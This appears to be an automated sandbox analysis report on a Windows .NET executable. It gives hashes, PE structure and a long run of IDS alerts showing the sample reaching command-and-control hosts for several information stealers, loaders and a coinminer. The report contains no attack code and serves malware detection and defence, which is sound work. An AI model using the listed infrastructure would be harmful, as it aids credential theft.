MD5:	96cb7df578398d5d46dd4daeffbdc41f
SHA1:	7b7ecf7d006c2e2cd2b237dde3402f6b78e6c54b
SHA256:	e301b79d4279d52c49c886fcd0ab8acc3941c5cf28c7dd0eb57e8af81fe476fb
SHA512:	84e915d323b1595c387123f7f5d8b5d291e2c2c9a8df9e4eba69deff9cc0ba195872065daa6f1c808a848eb8fd259cfd5f5ea164b8a3c9407bd6ca25fffc8479
SSDEEP:	49152:Al0Ivwg2krKlsBijSIpWALFfi1zfPmX9YSVY8ZAAiJte:tIvliWVA9i1Te2SVYYAD
TLSH:	E2B501A88275896CE4D9C5F4F1A6CE1F2E774B2138CDC389F6696EB8D93312ED114423
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... V...............P..l#...........#.. ....#...@.. ........................%...........@................................

File Icon


Icon Hash:	073b7343ccf25803

Static PE Info

General

Entrypoint:	0x6389fe
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x9C5620ED [Tue Feb 11 12:37:01 2053 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2389a9	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x23a000	0x20d4c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x25c000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x2388f8	0x38	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x236a04	0x236c00	ad17acdcf138eb7f4a5c04f7df2e147f	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x23a000	0x20d4c	0x20e00	230606391ada7a5f112675214d6f4876	False	0.4044156962927757	data	5.1906625929543475	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x25c000	0xc	0x200	68da1c7ffb326306242633f0d1b25bad	False	0.041015625	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x23a1a0	0x80a9	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.9884931839572517
RT_ICON	0x24225c	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	0.1811043416538507
RT_ICON	0x252a94	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	0.2531294284364667
RT_ICON	0x256ccc	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	0.29512448132780084
RT_ICON	0x259284	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.3625703564727955
RT_ICON	0x25a33c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1024	0.526595744680851
RT_GROUP_ICON	0x25a7b4	0x5a	data	0.7666666666666667
RT_VERSION	0x25a820	0x32c	data	0.46921182266009853
RT_MANIFEST	0x25ab5c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-21T14:48:08.851174+0200	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	1	192.168.2.9	49712	103.130.147.211	80	TCP
2024-09-21T14:48:09.021938+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49712	103.130.147.211	80	TCP
2024-09-21T14:48:09.021938+0200	2018581	ET MALWARE Single char EXE direct download likely trojan (multiple families)	1	192.168.2.9	49712	103.130.147.211	80	TCP
2024-09-21T14:48:09.432484+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49711	147.45.44.104	80	TCP
2024-09-21T14:48:09.443354+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49713	176.113.115.33	80	TCP
2024-09-21T14:48:09.573759+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49709	147.45.44.104	80	TCP
2024-09-21T14:48:09.642506+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49718	176.111.174.109	80	TCP
2024-09-21T14:48:10.468985+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49709	147.45.44.104	80	TCP
2024-09-21T14:48:10.625354+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49726	162.241.61.218	443	TCP
2024-09-21T14:48:10.640521+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49729	162.241.61.218	443	TCP
2024-09-21T14:48:10.682067+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49709	147.45.44.104	80	TCP
2024-09-21T14:48:10.933255+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49725	185.166.143.48	443	TCP
2024-09-21T14:48:11.772275+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49731	162.241.61.218	443	TCP
2024-09-21T14:48:12.772362+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49711	147.45.44.104	80	TCP
2024-09-21T14:48:13.239610+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49711	147.45.44.104	80	TCP
2024-09-21T14:48:15.698202+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49711	147.45.44.104	80	TCP
2024-09-21T14:48:41.408032+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.9	49739	5.53.124.195	80	TCP
2024-09-21T14:48:45.473784+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49743	116.203.165.127	443	TCP
2024-09-21T14:48:46.523820+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:46.523820+0200	2046045	ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization)	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:46.745662+0200	2043234	ET MALWARE Redline Stealer TCP CnC - Id1Response	1	193.233.255.84	4284	192.168.2.9	49745	TCP
2024-09-21T14:48:47.475216+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49746	116.203.165.127	443	TCP
2024-09-21T14:48:49.155853+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49747	116.203.165.127	443	TCP
2024-09-21T14:48:49.994066+0200	2049087	ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST	1	192.168.2.9	49747	116.203.165.127	443	TCP
2024-09-21T14:48:51.096686+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49751	116.203.165.127	443	TCP
2024-09-21T14:48:51.791197+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.165.127	443	192.168.2.9	49751	TCP
2024-09-21T14:48:51.939916+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:52.638117+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49753	116.203.165.127	443	TCP
2024-09-21T14:48:53.441147+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.165.127	443	192.168.2.9	49753	TCP
2024-09-21T14:48:55.457255+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.9	49755	5.53.124.195	80	TCP
2024-09-21T14:48:55.664418+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:55.669580+0200	2046056	ET MALWARE Redline Stealer/MetaStealer Family Activity (Response)	1	193.233.255.84	4284	192.168.2.9	49745	TCP
2024-09-21T14:48:55.858794+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49754	116.203.165.127	443	TCP
2024-09-21T14:48:55.897035+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:56.226962+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:56.232234+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:56.625756+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49756	116.203.165.127	443	TCP
2024-09-21T14:48:57.753719+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:57.979757+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:48:58.314046+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:00.380021+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49757	116.203.165.127	443	TCP
2024-09-21T14:49:01.262485+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49758	116.203.165.127	443	TCP
2024-09-21T14:49:02.729114+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49760	116.203.165.127	443	TCP
2024-09-21T14:49:03.446407+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49761	116.203.165.127	443	TCP
2024-09-21T14:49:04.004318+0200	2036289	ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro)	2	192.168.2.9	57472	1.1.1.1	53	UDP
2024-09-21T14:49:05.162152+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:05.548457+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:05.708059+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49763	116.203.165.127	443	TCP
2024-09-21T14:49:07.617661+0200	2054350	ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4	1	192.168.2.9	49764	5.53.124.195	80	TCP
2024-09-21T14:49:07.620133+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49765	116.203.165.127	443	TCP
2024-09-21T14:49:09.447293+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49766	116.203.165.127	443	TCP
2024-09-21T14:49:10.895143+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49767	116.203.165.127	443	TCP
2024-09-21T14:49:12.300715+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49768	116.203.165.127	443	TCP
2024-09-21T14:49:16.052524+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49769	116.203.165.127	443	TCP
2024-09-21T14:49:17.473958+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:18.007186+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49770	116.203.165.127	443	TCP
2024-09-21T14:49:18.347277+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:19.877574+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49771	116.203.165.127	443	TCP
2024-09-21T14:49:19.905417+0200	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.9	49772	45.202.35.101	80	TCP
2024-09-21T14:49:22.279030+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:22.571458+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:22.732950+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49773	116.203.165.127	443	TCP
2024-09-21T14:49:22.795755+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:23.027049+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:23.250649+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:23.481145+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:23.722893+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:25.544839+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49774	116.203.165.127	443	TCP
2024-09-21T14:49:27.944033+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49775	116.203.165.127	443	TCP
2024-09-21T14:49:30.781974+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.9	49776	147.45.44.104	80	TCP
2024-09-21T14:49:32.809731+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:33.488490+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49777	116.203.165.127	443	TCP
2024-09-21T14:49:33.724983+0200	2055834	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (sentistivowmi .shop)	1	192.168.2.9	57707	1.1.1.1	53	UDP
2024-09-21T14:49:33.942101+0200	2056008	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chickerkuso .shop)	1	192.168.2.9	63350	1.1.1.1	53	UDP
2024-09-21T14:49:34.728572+0200	2056009	ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI)	1	192.168.2.9	49779	172.67.173.81	443	TCP
2024-09-21T14:49:35.003496+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.9	49779	172.67.173.81	443	TCP
2024-09-21T14:49:35.003496+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49779	172.67.173.81	443	TCP
2024-09-21T14:49:36.410251+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49780	116.203.165.127	443	TCP
2024-09-21T14:49:37.126950+0200	2056022	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionmwq .shop)	1	192.168.2.9	55742	1.1.1.1	53	UDP
2024-09-21T14:49:37.607786+0200	2056023	ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI)	1	192.168.2.9	49781	104.21.85.92	443	TCP
2024-09-21T14:49:37.890382+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49782	185.196.8.214	80	TCP
2024-09-21T14:49:38.407829+0200	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.9	49781	104.21.85.92	443	TCP
2024-09-21T14:49:38.407829+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49781	104.21.85.92	443	TCP
2024-09-21T14:49:39.706883+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49783	185.196.8.214	80	TCP
2024-09-21T14:49:39.736965+0200	2054495	ET MALWARE Vidar Stealer Form Exfil	1	192.168.2.9	49784	45.132.206.251	80	TCP
2024-09-21T14:49:40.763392+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49785	185.196.8.214	80	TCP
2024-09-21T14:49:41.220148+0200	2056009	ET MALWARE Observed Win32/Lumma Stealer Related Domain (chickerkuso .shop in TLS SNI)	1	192.168.2.9	49787	172.67.173.81	443	TCP
2024-09-21T14:49:42.075690+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.9	49787	172.67.173.81	443	TCP
2024-09-21T14:49:42.075690+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49787	172.67.173.81	443	TCP
2024-09-21T14:49:42.462025+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49788	185.196.8.214	80	TCP
2024-09-21T14:49:43.415108+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49790	185.196.8.214	80	TCP
2024-09-21T14:49:44.874094+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49791	185.196.8.214	80	TCP
2024-09-21T14:49:45.908027+0200	2056023	ET MALWARE Observed Win32/Lumma Stealer Related Domain (questionmwq .shop in TLS SNI)	1	192.168.2.9	49794	104.21.85.92	443	TCP
2024-09-21T14:49:45.941056+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49792	116.203.165.127	443	TCP
2024-09-21T14:49:45.981364+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49793	185.196.8.214	80	TCP
2024-09-21T14:49:46.357534+0200	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.9	49794	104.21.85.92	443	TCP
2024-09-21T14:49:46.357534+0200	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.9	49794	104.21.85.92	443	TCP
2024-09-21T14:49:46.904866+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49795	185.196.8.214	80	TCP
2024-09-21T14:49:48.219452+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49796	116.203.165.127	443	TCP
2024-09-21T14:49:48.268760+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49797	185.196.8.214	80	TCP
2024-09-21T14:49:49.232949+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49798	185.196.8.214	80	TCP
2024-09-21T14:49:49.778702+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49799	116.203.165.127	443	TCP
2024-09-21T14:49:50.728631+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:50.828101+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49800	185.196.8.214	80	TCP
2024-09-21T14:49:50.951644+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:51.173742+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:51.490264+0200	2043231	ET MALWARE Redline Stealer TCP CnC Activity	1	192.168.2.9	49745	193.233.255.84	4284	TCP
2024-09-21T14:49:51.535711+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49801	116.203.165.127	443	TCP
2024-09-21T14:49:51.791934+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49802	185.196.8.214	80	TCP
2024-09-21T14:49:52.227581+0200	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	116.203.165.127	443	192.168.2.9	49801	TCP
2024-09-21T14:49:52.656211+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49804	185.196.8.214	80	TCP
2024-09-21T14:49:54.578245+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49805	116.203.165.127	443	TCP
2024-09-21T14:49:54.622756+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49806	185.196.8.214	80	TCP
2024-09-21T14:49:55.295023+0200	2051831	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1	1	116.203.165.127	443	192.168.2.9	49805	TCP
2024-09-21T14:49:55.841149+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49807	185.196.8.214	80	TCP
2024-09-21T14:49:57.301999+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49808	185.196.8.214	80	TCP
2024-09-21T14:49:58.238002+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49809	185.196.8.214	80	TCP
2024-09-21T14:49:59.573216+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49812	116.203.165.127	443	TCP
2024-09-21T14:49:59.676744+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49811	185.196.8.214	80	TCP
2024-09-21T14:50:00.211972+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49813	116.203.165.127	443	TCP
2024-09-21T14:50:00.567593+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49814	185.196.8.214	80	TCP
2024-09-21T14:50:01.420447+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49815	185.196.8.214	80	TCP
2024-09-21T14:50:02.374107+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49816	185.196.8.214	80	TCP
2024-09-21T14:50:04.284447+0200	2028765	ET JA3 Hash - [Abuse.ch] Possible Dridex	3	192.168.2.9	49818	116.203.165.127	443	TCP
2024-09-21T14:50:04.315801+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49817	185.196.8.214	80	TCP
2024-09-21T14:50:05.927417+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49819	185.196.8.214	80	TCP
2024-09-21T14:50:06.973593+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49820	185.196.8.214	80	TCP
2024-09-21T14:50:07.916699+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49821	185.196.8.214	80	TCP
2024-09-21T14:50:08.874848+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49822	185.196.8.214	80	TCP
2024-09-21T14:50:09.959603+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49823	185.196.8.214	80	TCP
2024-09-21T14:50:10.962742+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49824	185.196.8.214	80	TCP
2024-09-21T14:50:11.927391+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49825	185.196.8.214	80	TCP
2024-09-21T14:50:13.730144+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49826	185.196.8.214	80	TCP
2024-09-21T14:50:15.583568+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49827	185.196.8.214	80	TCP
2024-09-21T14:50:16.500899+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49828	185.196.8.214	80	TCP
2024-09-21T14:50:17.802828+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.9	49829	62.150.232.50	80	TCP
2024-09-21T14:50:19.044784+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.9	49830	62.150.232.50	80	TCP
2024-09-21T14:50:20.419092+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49832	185.196.8.214	80	TCP
2024-09-21T14:50:20.423036+0200	2039103	ET MALWARE Suspected Smokeloader Activity (POST)	1	192.168.2.9	49831	62.150.232.50	80	TCP
2024-09-21T14:50:20.785479+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49832	185.196.8.214	80	TCP
2024-09-21T14:50:21.603699+0200	2049467	ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1	1	192.168.2.9	49834	185.196.8.214	80	TCP
